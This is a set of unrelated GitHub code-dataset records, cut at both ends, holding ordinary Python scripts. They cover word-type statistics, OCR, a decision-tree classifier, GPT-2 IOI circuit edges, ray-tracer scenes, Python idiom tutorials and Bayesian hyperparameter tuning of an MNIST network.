available\")\r\n\treturn \r\n\r\ndef generate_type_statistics(type_list):\r\n\ttypes_statistics = {}\r\n\tfor type_entity in type_list:\r\n\t\tword_type_list = type_entity[0] \r\n\t\ttitle_len = type_entity[1]\r\n\t\ttitle = type_entity[2]\r\n\t\ttn = type_num_calculate(word_type_list,title_len)\r\n\t\ttry:\r\n\t\t\ttypes_statistics[tn][0]+=1\r\n\t\t\ttypes_statistics[tn][1].append(title)\r\n\t\texcept:\r\n\t\t\ttypes_statistics[tn] = [1,[title]]\r\n\r\n\treturn types_statistics\r\n\r\ndef type_num_calculate(word_type_list, title_len):\r\n\t\r\n\ttype_num = '_'.join(list(map(str, word_type_list))) + '_' + str(title_len)\r\n\t\r\n\treturn type_num\r\ndef save_type_statistics(section):\r\n\t#file_dir = database_crawling , target = 'arcade'\r\n\ttitle_list = clear_parser(select_section('database/'+section,section),2,stereotype,stereotype_2)\r\n\tmax_title_len = 10\r\n\t#types = [[] for i in range(max_title_len)]\r\n\t\r\n\tcl_dict = 
read_cluster('database/'+section+'/clustered_dictionary.json')\r\n\tbigdic = {}\r\n\tfor i in range(max_title_len):\r\n\t\tbigdic[str(i)] = [[] for i in range(max_title_len)]\r\n\tfor title_ in title_list: # [ 1 2 3 4 .. ]\r\n\t\ttitle = title_\r\n\t\ttitle_len = len(title_.split()) # Andong will handle this.\r\n\t\ttemp_title = []\r\n\t\tnondict_cnt = 0\r\n\t\tfor tw in title.split():\r\n\t\t\ttry:\r\n\t\t\t\ttwidx = cl_dict[tw.lower()]\r\n\t\t\texcept:\r\n\t\t\t\t#print(\"no word exists as {}\".format(word))\r\n\t\t\t\tnondict_cnt = nondict_cnt +1\r\n\t\t\ttemp_title.append(classify_word_type2(tw.lower(),cl_dict))\r\n\r\n\t\t#types[title_len].append([temp_title,title_len,title])\r\n\t\t#print(nondict_cnt, title_len, temp_title, title)\r\n\t\tbigdic[str(nondict_cnt)][title_len].append([temp_title,title_len,title])\r\n\t#types : [list of [list of type] , title]\r\n\t# ex : title = cookie run -> types = [[[[0,1,1] ,[1,0,0]], cookie run] , [[[0,1,1] ,[1,0,0]], cookie run] , [[[0,1,1] ,[1,0,0]], cookie run]]\r\n\t# now : types = [ [ [[0,1,1], [1,0,0]], 2, cookie run ], [ [[0,1,1], [1,0,0]], 2, cookie run ] , [ [[0,1,1], [1,0,0]], 2, cookie run ] ...]\r\n\t# type_statistics --> type_statistics[type_number] = number of type_number's instance ; [0,1,1] => 3. [1,0,0] => 4\r\n\t# now : type number = [ [[0,1,1],[1,0,0]],2 ] => 342, i.e. the last digit is the word count\r\n\ttype_statistics = []\r\n\tfor j in range(max_title_len):\r\n\t\ttype_statistics.append([generate_type_statistics(bigdic[str(j)][i]) for i in range(max_title_len)])# if len(bigdic[str(j-i)][i])>0])\r\n\t\t#type_statistics.append([generate_type_statistics(bigdic[str(j-i)][i]) for i in range(j+1) if len(bigdic[str(j-i)][i])>0])\r\n\twith open('database/'+section+'/type_statistics.json','w') as f:\r\n\t\tjson.dump(type_statistics,f)\r\n\treturn type_statistics\r\n\r\nif __name__=='__main__':\r\n\t# test_routine takes no arguments and returns nothing; the old call\r\n\t# (bigdic, type_statistics = test_routine('')) raised a TypeError\r\n\ttest_routine()\r\n\t#print (bigdic)\r\n\t#print ('---------------------------------------------')\r\n\t#print (type_statistics)\r\n'''\r\nfor x in type_statistics[2].items():\r\n\tprint(x[1][0], x[0])\r\nprint(type_statistics[1])\r\nprint(type_statistics[2])\r\nprint(type_statistics[3])\r\n'''\r\ndef read_cluster(filepath):\r\n\twith open(filepath) as f:\r\n\t\tt = json.load(f)\r\n\treturn t\r\ndef classify_word_type2(w,dict_):\r\n\t#res = []\r\n\t#for w in w_list:\r\n\ttry:\r\n\t\tt = dict_[w]\r\n\texcept:\r\n\t\tt = -1\r\n\t\t#res.append(t)\r\n\t#res.append(len(w_list))\r\n\t#return '_'.join(res)\r\n\treturn t\r\n","repo_name":"hyun78/Eureka","sub_path":"Eureka_web/app/word_classification.py","file_name":"word_classification.py","file_ext":"py","file_size_in_byte":5729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"19854227156","text":"import easyocr\nreader = easyocr.Reader(['ch_sim','en']) # this needs to run only once to load the model into memory\n# result = reader.readtext('chinese.jpg')\nresult = reader.readtext('position1.png')\n\ndef f1(a):\n    '''\n    The input a is a list; each entry holds four coordinates, and each coordinate is an x value and a y value.\n    '''\n    output = 0\n    #what is i?\n    for i in a:\n        if i[0] == [720, 346]:\n            output = i\n    return output\n\ndef f2(b):\n    output = 0\n    for i in b:\n        if i[0][0] ==[720, 346]:\n            output = i[1]\n    return output\nlist_positions = []\nfor i in result:\n    list_positions.append(i[0])\n    # print(i,type(i),i[0])\n\nfor i in list_positions:\n    print(i,type(i),i[0],i[1])\n    if i[0] == [720, 346]:\n        
print('here')\n\nprint(f2(result))\n#\"\"\"\n'''\nHow do I use a regular expression to extract a specific format from a string, such as ()? For example, the content inside the parentheses?\nHow to cook. What should I eat? How do I cook something tasty?\nWhere are my chopsticks? How do I wash the pot?\n\n'''\n\n","repo_name":"YaoPeixuan/A","sub_path":"a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"41398932118","text":"from sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.tree import DecisionTreeClassifier\nimport csv\n\n\ndef algorithm_decision(x_train, y_train, x_test, y_test, algorithm, name):\n    classifier = DecisionTreeClassifier(criterion=algorithm)\n    classifier.fit(x_train, y_train)\n    y_prediction = classifier.predict(x_test)\n    print(\"-----------{} Decision tree: -----------------\".format(name))\n    print(\"+++++++++++ confusion matrix +++++++++++++++++++\")\n    print(confusion_matrix(y_test, y_prediction))\n    print(\"+++++++++++ classification result ++++++++++++++\")\n    print(classification_report(y_test, y_prediction))\n    correct = 0\n    for i in range(len(y_prediction)):\n        if y_test[i] == y_prediction[i]:\n            correct += 1\n    print(\"+++++++++++ Accuracy ++++++++++++++++++++\")\n    print(correct / float(len(y_test)))\n\n\ndef main():\n\n    traindata = csv.reader(open('aps_failure_training_set.csv'))\n    train = []\n    for row in traindata:\n        train.append(list(row))\n\n    for i in range(1, len(train[21])):\n        pos = 0.0\n        neg = 0.0\n        posc = 0\n        negc = 0\n        for j in range(21, len(train)):\n            if train[j][0] == 'pos' and train[j][i] != 'na':\n                pos += float(train[j][i])\n                posc += 1\n            elif train[j][0] == 'neg' and train[j][i] != 'na':\n                neg += float(train[j][i])\n                negc += 1\n        if posc != 0:\n            pos = pos / posc\n        if negc != 0:\n            neg = neg / negc\n        for j in range(21, len(train)):\n            if train[j][i] == 'na' and train[j][0] == 'neg':\n                train[j][i] = str(neg)\n            if train[j][i] == 'na' and train[j][0] == 'pos':\n                train[j][i] = str(pos)\n\n    y_train = []\n    x_train = []\n    for o in range(21, len(train)):\n        x = []\n        for i in range(1, len(train[21])):\n            x.append(train[o][i])\n        x_train.append(x)\n\n    for m in range(21, len(train)):\n        y_train.append(train[m][0])\n\n\n    testdata = csv.reader(open('aps_failure_test_set.csv'))\n    test = []\n    for row in testdata:\n        test.append(list(row))\n\n    for i in range(1, len(test[21])):\n        pos = 0.0\n        neg = 0.0\n        posc = 0\n        negc = 0\n        for j in range(21, len(test)):\n            if test[j][0] == 'pos' and test[j][i] != 'na':\n                pos += float(test[j][i])\n                posc += 1\n            elif test[j][0] == 'neg' and test[j][i] != 'na':\n                neg += float(test[j][i])\n                negc += 1\n        if posc != 0:\n            pos = pos / posc\n        if negc != 0:\n            neg = neg / negc\n        for j in range(21, len(test)):\n            if test[j][i] == 'na' and test[j][0] == 'neg':\n                test[j][i] = str(neg)\n            if test[j][i] == 'na' and test[j][0] == 'pos':\n                test[j][i] = str(pos)\n\n    y_test = []\n    x_test = []\n    for o in range(21, len(test)):\n        x = []\n        for i in range(1, len(test[21])):\n            x.append(test[o][i])\n        x_test.append(x)\n\n    for m in range(21, len(test)):\n        y_test.append(test[m][0])\n\n\n    for (algorithm, name) in [(\"gini\", \"ID3\"), (\"entropy\", \"C4.5\")]:\n        algorithm_decision(x_train, y_train, x_test, y_test, algorithm, name)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"mhaghshomar/entropy-C4.5-classification-scania-and-trucks","sub_path":"scania.py","file_name":"scania.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1307774683","text":"# Based on:\n# 
https://github.com/ArthurConmy/Automatic-Circuit-Discovery/blob/main/acdc/ioi/utils.py\n# I added the token positions based on the findings in the paper\nfrom dataclasses import dataclass\nfrom typing import Dict, List, Optional, Set, Tuple\n\nfrom auto_circuit.types import Edge\nfrom auto_circuit.utils.patchable_model import PatchableModel\n\nIOI_CIRCUIT = {\n    \"name mover\": [\n        (9, 9), # by importance\n        (10, 0),\n        (9, 6),\n    ],\n    \"backup name mover\": [\n        (10, 10),\n        (10, 6),\n        (10, 2),\n        (10, 1),\n        (11, 2),\n        (9, 7),\n        (9, 0),\n        (11, 9),\n    ],\n    \"negative\": [(10, 7), (11, 10)],\n    \"s2 inhibition\": [(7, 3), (7, 9), (8, 6), (8, 10)],\n    \"induction\": [(5, 5), (5, 8), (5, 9), (6, 9)],\n    \"duplicate token\": [\n        (0, 1),\n        (0, 10),\n        (3, 0),\n        # (7, 1),\n    ], # unclear exactly what (7,1) does\n    \"previous token\": [\n        (2, 2),\n        # (2, 9),\n        (4, 11),\n        # (4, 3),\n        # (4, 7),\n        # (5, 6),\n        # (3, 3),\n        # (3, 7),\n        # (3, 6),\n    ],\n}\n\n\n@dataclass(frozen=True)\nclass Conn:\n    inp: str\n    out: str\n    qkv: List[Tuple[Optional[str], int]]\n\n\ndef ioi_true_edges(model: PatchableModel, token_positions: bool = False) -> Set[Edge]:\n    assert model.cfg.model_name == \"gpt2\"\n\n    special_connections: List[Conn] = [\n        Conn(\"INPUT\", \"previous token\", [(\"q\", 5), (\"k\", 4), (\"v\", 4)]),\n        Conn(\"INPUT\", \"duplicate token\", [(\"q\", 10), (\"k\", 4), (\"v\", 4)]),\n        Conn(\"INPUT\", \"s2 inhibition\", [(\"q\", 14)]),\n        Conn(\"INPUT\", \"negative\", [(\"k\", 2), (\"v\", 2)]),\n        Conn(\"INPUT\", \"name mover\", [(\"k\", 2), (\"v\", 2)]),\n        Conn(\"INPUT\", \"backup name mover\", [(\"k\", 2), (\"v\", 2)]),\n        Conn(\"previous token\", \"induction\", [(\"k\", 5), (\"v\", 5)]),\n        Conn(\"induction\", \"s2 inhibition\", [(\"k\", 10), (\"v\", 10)]),\n        Conn(\"duplicate token\", \"s2 inhibition\", [(\"k\", 10), (\"v\", 10)]),\n        Conn(\"s2 inhibition\", \"negative\", [(\"q\", 14)]),\n        Conn(\"s2 inhibition\", \"name mover\", [(\"q\", 14)]),\n        Conn(\"s2 inhibition\", \"backup name mover\", [(\"q\", 14)]),\n        Conn(\"negative\", \"OUTPUT\", [(None, 14)]),\n        Conn(\"name mover\", \"OUTPUT\", [(None, 14)]),\n        Conn(\"backup name mover\", \"OUTPUT\", [(None, 14)]),\n    ]\n    edges_present: Dict[str, int] = {}\n    for conn in special_connections:\n        edge_src_names, edge_dests = [], []\n        if conn.inp == \"INPUT\":\n            edge_src_names = [\"Resid Start\"]\n        else:\n            for (layer, head) in IOI_CIRCUIT[conn.inp]:\n                edge_src_names.append(f\"A{layer}.{head}\")\n        if conn.out == \"OUTPUT\":\n            assert len(conn.qkv) == 1\n            final_tok_idx = conn.qkv[0][1]\n            edge_dests.append((\"Resid End\", final_tok_idx))\n        else:\n            for (layer, head) in IOI_CIRCUIT[conn.out]:\n                for qkv in conn.qkv:\n                    assert qkv[0] is not None\n                    edge_dests.append((f\"A{layer}.{head}.{qkv[0].upper()}\", qkv[1]))\n\n        # Connect all MLPs in between heads in the circuit\n        # (in the IOI paper they allow activations to flow through MLPs,\n        # which is equivalent to including all MLPs in between two nodes.)\n        if conn.inp == \"INPUT\":\n            src_layer = 0\n        else:\n            src_layer = min([layer for (layer, _) in IOI_CIRCUIT[conn.inp]])\n\n        if conn.out == \"OUTPUT\":\n            dest_layer = conn.qkv[0][1]\n        else:\n            dest_layer = max([layer for (layer, _) in IOI_CIRCUIT[conn.out]])\n        dest_tok_idxs = [tok_idx for (_, tok_idx) in conn.qkv]\n\n        # Src layer is inclusive because MLP comes after ATTN\n        for layer in range(src_layer, dest_layer):\n            for tok_idx in dest_tok_idxs:\n                edge_src_names.append(f\"MLP {layer}\")\n                edge_dests.append((f\"MLP {layer}\", tok_idx))\n\n        for src_name in edge_src_names:\n            for dest_name, tok_pos in 
edge_dests:\n edges_present[f\"{src_name}->{dest_name}\"] = tok_pos\n\n true_edges: Set[Edge] = set()\n for edge in model.edges:\n if edge.name in edges_present.keys():\n if token_positions:\n true_edges.add(Edge(edge.src, edge.dest, edges_present[edge.name]))\n else:\n true_edges.add(edge)\n return true_edges\n","repo_name":"UFO-101/auto-circuit","sub_path":"auto_circuit/metrics/official_circuits/ioi_official.py","file_name":"ioi_official.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"203997739","text":"import math\nfrom Color import Color\nfrom Tuple import Tuple\nfrom Canvas import Canvas\nfrom Matrix import Matrix\nfrom Ray import Ray\nfrom Sphere import Sphere\nfrom Plane import Plane\nfrom Intersection import Intersection\nfrom Material import Material\nfrom Light import Light\nfrom World import World\nfrom Camera import Camera\nfrom Pattern import Pattern\nfrom Cube import Cube\nfrom Group import Group\nfrom Cylinder import Cylinder\nfrom Cone import Cone\n\n\ndef image1():\n o = Tuple.point(0, 0, -5)\n wallZ = 10\n wallSize = 7\n canvasPixel = 100\n pixSize = wallSize/canvasPixel\n half = wallSize/2\n canv = Canvas(canvasPixel, canvasPixel)\n color = Color(1, 0, 0)\n s = Sphere()\n s.transform = Matrix.shearing(1, 0, 0, 0, 0, 0) * Matrix.scaling(0.5, 1, 1)\n for y in range(canvasPixel):\n wy = half-pixSize*y\n for x in range(canvasPixel):\n wx = pixSize*x-half\n position = Tuple.point(wx, wy, wallZ)\n r = Ray(o, (position-o).normalize())\n count, xs = s.intersect(r)\n if Intersection.hit(xs) != Intersection():\n canv.writePixel(x, y, color)\n canv.saveImage(\"image1\")\n\n\ndef image2():\n o = Tuple.point(0, 0, -5)\n wallZ = 10\n wallSize = 7\n canvasPixel = 100\n pixSize = wallSize/canvasPixel\n half = wallSize/2\n canv = Canvas(canvasPixel, canvasPixel)\n\n # sphere\n s = Sphere()\n s.material.color = Color(1, 0.2, 1)\n s.transform = Matrix.shearing(1, 0, 0, 0, 0, 0) * Matrix.scaling(0.5, 1, 1)\n\n # light\n light = Light(Tuple.point(-10, 10, -10), Color(1, 1, 1))\n\n for y in range(canvasPixel):\n wy = half-pixSize*y\n for x in range(canvasPixel):\n wx = pixSize*x-half\n position = Tuple.point(wx, wy, wallZ)\n r = Ray(o, (position-o).normalize())\n count, xs = s.intersect(r)\n h = Intersection.hit(xs)\n if h != Intersection():\n p = r.position(h.t)\n normal = h.shape.normalAt(p)\n eye = ~r.direction\n color = h.shape.material.lighting(light, p, eye, normal)\n canv.writePixel(x, y, color)\n canv.saveImage(\"image2\")\n\n\ndef image3():\n floor = Plane()\n floor.transform = Matrix.scaling(10, 0.01, 10)\n floor.material = Material(color=Color(1, 0.9, 0.9), specular=0)\n\n leftWall = Plane()\n leftWall.transform = Matrix.translation(\n 0, 0, 5) * Matrix.rotateY(-math.pi/4) * Matrix.rotateX(math.pi/2)*Matrix.scaling(10, 0.01, 10)\n leftWall.material = Material(color=Color(1, 0.9, 0.9), specular=0)\n\n rightWall = Plane()\n rightWall.transform = Matrix.translation(\n 0, 0, 5) * Matrix.rotateY(math.pi/4) * Matrix.rotateX(math.pi/2)*Matrix.scaling(10, 0.01, 10)\n rightWall.material = Material(color=Color(1, 0.9, 0.9), specular=0)\n\n mid = Sphere()\n # print(mid.material.pattern)\n mid.transform = Matrix.translation(-0.5, 1, 0.5)\n mid.material = Material(color=Color(0.1, 1, 0.5),\n specular=0.3, diffuse=0.7)\n\n right = Cube()\n # print(\"Change Pattern\")\n # print(right.pattern)\n right.transform = Matrix.translation(\n 1.5, 0.5, -0.5)*Matrix.scaling(0.5, 0.5, 0.5)\n 
right.material = Material(color=Color(\n        0.5, 1, 0.1), specular=0.3, diffuse=0.7)\n    right.material.pattern = Pattern(\n        Color(0, 0, 0), Color(1, 1, 1), patternType=\"gradient\")\n\n    left = Sphere()\n    left.transform = Matrix.translation(\n        -1.5, 0.33, -0.75)*Matrix.scaling(0.33, 0.33, 0.33)\n    left.material = Material(color=Color(1, 0.8, 0.1),\n                             specular=0.3, diffuse=0.7)\n\n    shapes = [floor, leftWall, rightWall, mid, right, left]\n    lights = [Light(Tuple.point(-10, 10, -10), Color(1, 1, 1))]\n\n    w = World(lights, shapes)\n\n    c = Camera(100, 50, math.pi/3)\n    c.transform = Matrix.viewTransformation(\n        Tuple.point(0, 1.5, -5),\n        Tuple.point(0, 1, 0),\n        Tuple.vector(0, 1, 0)\n    )\n\n    image = c.render(w)\n    image.saveImage(\"image4\")\n\n\ndef image4():\n    # corner of a hexagon\n    def hexCorner():\n        c = Sphere()\n        c.transform = Matrix.translation(\n            0, 0, -1) * Matrix.scaling(0.25, 0.25, 0.25)\n        return c\n\n    # edge of a hexagon\n    def hexEdge():\n        e = Cylinder(0, 1)\n        e.transform = Matrix.translation(\n            0, 0, -1) * Matrix.rotateY(-math.pi/6) * Matrix.rotateZ(-math.pi/2) * Matrix.scaling(0.25, 1, 0.25)\n        return e\n\n    # side of a hexagon\n    def hexSide():\n        s = Group([hexCorner(), hexEdge()])\n        return s\n\n    hexagon = Group()\n    for i in range(6):\n        s = hexSide()\n        s.transform = Matrix.rotateY(i*math.pi/3)\n        hexagon.addChild(s)\n\n    shapes = [hexagon]\n    lights = [Light(Tuple.point(-10, 10, -10), Color(1, 1, 1))]\n\n    w = World(lights, shapes)\n\n    c = Camera(100, 50, math.pi/3)\n    c.transform = Matrix.viewTransformation(\n        Tuple.point(0, 1.5, -5),\n        Tuple.point(0, 1, 0),\n        Tuple.vector(0, 1, 0)\n    )\n\n    image = c.render(w)\n    image.saveImage(\"image5\")\n","repo_name":"YufeiLinUlysses/LearnDataScience","sub_path":"Getting Started/SimpleProject/Backend/src/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"33828088459","text":"# ---------------------------------------- The Zip Function ----------------------------------------\nnames = ['bulbasaur', 'charmander', 'squirtle']\nhps = [45, 39, 44]\n\n# example of non-pythonic combining objects ----------------------------------------\ncombined = []\n\nfor i, pokemon in enumerate(names):\n    combined.append((pokemon, hps[i]))\n\nprint(f'non-pythonic combining objects: {combined}')\n\n# example of pythonic combining objects ----------------------------------------\ncombined_zip = zip(names, hps)\ncombined_zip_list = [*combined_zip]\n\nprint(f'pythonic combining objects: {combined_zip_list}')\n\n# ---------------------------------------- The Collections Module ----------------------------------------\n# namedtuple: tuple subclasses with named fields\n# deque: list-like container with fast appends and pops\n# Counter: dict for counting hashable objects\n# OrderedDict: dict that retains order of entries\n# defaultdict: dict that calls a factory function to supply missing values\n\npoke_types = ['grass', 'dark', 'fire', 'fire']\n\n# example of non-pythonic counting ----------------------------------------\ntype_counts = {}\n\nfor poke_type in poke_types:\n    if poke_type in type_counts:\n        type_counts[poke_type] += 1\n    else:\n        type_counts[poke_type] = 1\n\nprint(f'non-pythonic counting: {type_counts}')\n\n# example of pythonic counting ----------------------------------------\nfrom collections import Counter\n\ncount_poke = Counter(poke_types)\nprint(f'pythonic counting: {count_poke}')\n\n# ---------------------------------------- The Itertools Module 
----------------------------------------\n# infinite iterators: count, cycle, repeat\n# finite iterators: accumulate, chain, zip_longest, etc\n# combination generators: product, permutations, combinations\n\npoke_types = ['bug', 'fire', 'ghost', 'grass', 'water']\n\n# example of non-pythonic combinations ----------------------------------------\ncombos = []\n\nfor x in poke_types:\n for y in poke_types:\n if x == y:\n continue\n if ((x,y) not in combos) and ((y,x) not in combos):\n combos.append((x,y))\nprint(f'non-pythonic combinations: {combos}')\n\n# example of pythonic combinations ----------------------------------------\nfrom itertools import combinations\n\ncombos_obj = combinations(poke_types, 2)\ncombos_obj_list = [*combos_obj]\n\nprint(f'pythonic combinations: {combos_obj_list}')\n\n# ---------------------------------------- The Set Type ----------------------------------------\n# set datatype has following methods:\n# intersection(): all elements that are in both sets\n# difference(): all elements in one set but not the other\n# symmetric_difference(): all elements in exactly one set\n# union(): all elements that are in either set\n\nlist_a = ['bulbasaur', 'charmander', 'squirtle']\nlist_b = ['caterpie', 'pidgey', 'squirtle']\n\n# example of non-pythonic way to find elements that exist in both lists ----------------------------------------\nin_common = []\n\nfor pokemon_a in list_a:\n for pokemon_b in list_b:\n if pokemon_a == pokemon_b:\n in_common.append(pokemon_a)\n \nprint(f'non-pythonic way to find elements exist in both lists: {in_common}')\n\n# example of pythonic way to find elements that exist in both lists ----------------------------------------\nset_a = set(list_a)\nset_b = set(list_b)\n\nintersect = set_a.intersection(set_b)\nintersect_list = [*intersect]\n\nprint(f'pythonic way to find elements exist in both lists: {intersect_list}')\n\n# example of pythonic way to find elements that exist in one list but not in other ----------------------------------------\nset_a = set(list_a)\nset_b = set(list_b)\n\ndifference = set_a.difference(set_b)\ndifference_list = [*difference]\n\nprint(f'pythonic way to find elements exist in one list but not in other list: {difference_list}')\n\n# example of pythonic way to find elements that exist in exactly one list and not both ----------------------------------------\nset_a = set(list_a)\nset_b = set(list_b)\n\nsymmetric_difference = set_a.symmetric_difference(set_b)\nsymmetric_difference_list = [*symmetric_difference]\n\nprint(f'pythonic way to find elements exist in exactly one list and not both: {symmetric_difference_list}')\n\n# example of pythonic way to collect all unique elements that appear in either or both lists ----------------------------------------\nset_a = set(list_a)\nset_b = set(list_b)\n\nunion = set_a.union(set_b)\nunion_list = [*union]\n\nprint(f'pythonic way to collect all unique elements that appear in either or both lists: {union_list}')\n\n# ---------------------------------------- Eliminate Loops ----------------------------------------\npoke_stats = [\n [90, 92, 75, 60],\n [25, 20, 15, 90],\n [65, 130, 60, 75]\n]\n\n# example of non-pythonic way to sum row ----------------------------------------\ntotals = []\nfor row in poke_stats:\n totals.append(sum(row))\n\nprint(f'non-pythonic way to sum row: {totals}')\n\n# example of using list comprehension way to sum row ----------------------------------------\ntotals_comp = [sum(row) for row in poke_stats]\n\nprint(f'using list comprehension way to sum row: 
{totals_comp}')\n\n# example of using map in list comprehension to sum row ----------------------------------------\ntotals_sum = [*map(sum, poke_stats)]\n\nprint(f'using map in list comprehension to sum row: {totals_sum}')\n\n# ----------------------------------------\n\n# example of using map in list comprehension to find mean row ----------------------------------------\nimport statistics\n\nmean_sum = [*map(statistics.mean, poke_stats)]\n\nprint(f'using map in list comprehension to find mean row: {mean_sum}')\n\n# example of using numpy and list comprehension to find mean row ----------------------------------------\nimport numpy as np\n\npoke_stats_np = np.array(poke_stats)\nmean_np = [np.mean(row) for row in poke_stats_np]\nmean_np_list = [*mean_np]\n\nprint(f'using numpy & list comprehension to find mean row: {mean_np_list}')\n\n# example of using numpy and axis to find mean row ----------------------------------------\nimport numpy as np\n\npoke_stats_np = np.array(poke_stats)\nmean_simple_np = poke_stats_np.mean(axis=1)\nmean_simple_np_list = [*mean_simple_np]\n\nprint(f'using numpy and axis to find mean row: {mean_simple_np_list}')","repo_name":"firdausraginda/python-efficient-code","sub_path":"writing-efficient-python/gaining-efficiencies.py","file_name":"gaining-efficiencies.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"29434855903","text":"count = 0\ntotal = 0\n\nfilename = input('Enter filename:> ')\n\ntry:\n    contents = open(filename)\n    \nexcept:\n    if filename == 'na na boo boo':\n        print(\"Fuck You!\")\n        quit()\n    else:\n        print('File not found', filename)\n        quit()\n    \n\nfor line in contents:\n    if line.startswith('X-DSPAM-Confidence:'): \n        count = count + 1\n        #print(count)\n        pos = line.find(':')\n        #print(pos)\n        number = float(line[pos + 1:].strip())\n        #print(number)\n        total = total + number\n        #print(total)\nprint('Count is:> ',count)\nprint('Total is:> ',total)\n \nave = total/count\nprint('Average Spam Confidence is:>',ave)\n \n\n\n\n \n","repo_name":"Curva-Tech/Py4E","sub_path":"pyfor/ex7.2.py","file_name":"ex7.2.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"42204982618","text":"class Solution:\n    def minimumTime(self, time: List[int], totalTrips: int) -> int:\n        minimum , maximum = 1 , min(time) * totalTrips\n        while minimum < maximum:\n            mid = (minimum + maximum) // 2\n            current_time = 0\n            for i in range(len(time)):\n                current_time = current_time + mid // time[i]\n            if current_time >= totalTrips:\n                maximum = mid\n            else:\n                minimum = mid + 1\n        return minimum\n\t\t","repo_name":"harshita1611/leet_code","sub_path":"my-folder/problems/minimum_time_to_complete_trips/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"32513251424","text":"# -*- coding: utf-8 -*-\n\nfrom BO.bayesian_optimization import BayesianOptimization\n\nimport sys\nfrom collections import OrderedDict\nimport numpy as np\nimport tensorflow as tf\n\n# data mnist\nfrom mnist_data.mnist import download_mnist, load_mnist, key_file\ndownload_mnist()\nX_train = load_mnist(key_file[\"train_img\"])[8:, :]\nX_test = load_mnist(key_file[\"test_img\"], )[8:,:]\ny_train = load_mnist(key_file[\"train_label\"], 1)\ny_test = load_mnist(key_file[\"test_label\"], 1)\n\n\n# 
objective function (a function that takes the hyperparameters as arguments)\ndef MLP(alpha, lr, layer1, layer2, layer3):\n    X = tf.placeholder(tf.float32, [None, 784])\n    label = tf.placeholder(tf.int32, [None, ])\n    y_ = tf.one_hot(label, depth=10, dtype=tf.float32)\n\n    w_0 = tf.Variable(tf.random_normal([784, int(layer1)], mean=0.0, stddev=0.05))\n    b_0 = tf.Variable(tf.zeros([int(layer1)]))\n    h_0 = tf.sigmoid(tf.matmul(X, w_0) + b_0)\n\n    w_1 = tf.Variable(tf.random_normal([int(layer1), int(layer2)], mean=0.0, stddev=0.05))\n    b_1 = tf.Variable(tf.zeros([int(layer2)]))\n    h_1 = tf.sigmoid(tf.matmul(h_0, w_1) + b_1)\n\n    w_2 = tf.Variable(tf.random_normal([int(layer2), int(layer3)], mean=0.0, stddev=0.05))\n    b_2 = tf.Variable(tf.zeros([int(layer3)]))\n    h_2 = tf.sigmoid(tf.matmul(h_1, w_2) + b_2)\n\n    w_o = tf.Variable(tf.random_normal([int(layer3), 10], mean=0.0, stddev=0.05))\n    b_o = tf.Variable(tf.zeros([10]))\n    y = tf.nn.softmax(tf.matmul(h_2, w_o) + b_o)\n\n    cross_entropy = -tf.reduce_sum(y_ * tf.log(y))\n\n    L2_sqr = tf.nn.l2_loss(w_0) + tf.nn.l2_loss(w_1) + tf.nn.l2_loss(w_2)\n\n    loss = cross_entropy + alpha * L2_sqr\n    train_step = tf.train.GradientDescentOptimizer(lr).minimize(loss)\n\n    correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\n    accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n\n    init = tf.initialize_all_variables()\n    with tf.Session() as sess:\n        sess.run(init)\n        print(\"Training...\")\n        for i in range(20000):\n            #batch_x, batch_y = X_train[(50*i):(50*(i+1)),:], y_train[(50*i):(50*(i+1)),0]\n            batch_index = np.random.choice(X_train.shape[0], 50, replace=False)\n            batch_x = X_train[batch_index, :]\n            batch_y = y_train[batch_index, 0]\n\n            train_step.run({X: batch_x, label: batch_y})\n            if i % 2000==0:\n                train_accuracy = accuracy.eval({X: batch_x, label: batch_y})\n                #print(\" %6d %6.3f\" % (i, train_accuracy))\n        accuracy = accuracy.eval({X: X_test, label: y_test[:,0]})\n        print(\"accuracy %6.3f\" % accuracy)\n    return accuracy\n\ndef main(k_num, acq, verbose=True):\n    gp_params = {\"alpha\": 1e-5}\n\n    # specify the range of each hyperparameter\n    BO = BayesianOptimization(MLP,\n            {\"alpha\": (1e-8, 1e-4), \"lr\": (1e-6, 1e-2),\n            \"layer1\": (10, 100),\"layer2\": (10, 100),\"layer3\": (10, 100)},\n            verbose=verbose, kernel_num = k_num)\n\n    BO.explore({\"alpha\": [1e-8, 1e-8, 1e-4, 1e-4],\"lr\": [1e-6, 1e-2, 1e-6, 1e-2],\n            \"layer1\": [10, 50, 100, 50], \"layer2\": [10, 50, 100, 50],\"layer3\": [10, 50, 100, 50]})\n\n    BO.maximize(n_iter=200, acq=acq, **gp_params)\n\n    print(\"-\"*53)\n    print(\"Final Results\")\n    print(\"kernel: {}\".format(str(BO.kernel)))\n    print(\"acquisition function: {}\".format(BO.acquisition))\n\n    print(\"score: {}\".format(BO.res[\"max\"][\"max_val\"]))\n    print(\"best_parameter: \")\n    print(BO.res[\"max\"][\"max_params\"])\n    print(\"-\"*53)\n\nif __name__ == \"__main__\":\n    main(0, \"ucb\")\n    # kernel function\n    # 0: Matern(nu=0.5)\n    # 1: Matern(nu=1.5)\n    # 2: Matern(nu=2.5)\n    # 3: RBF\n    # can be added or changed in bayesian_optimization.py\n    # acquisition function\n    # ucb\n    # ei\n    # poi\n    # can be added in 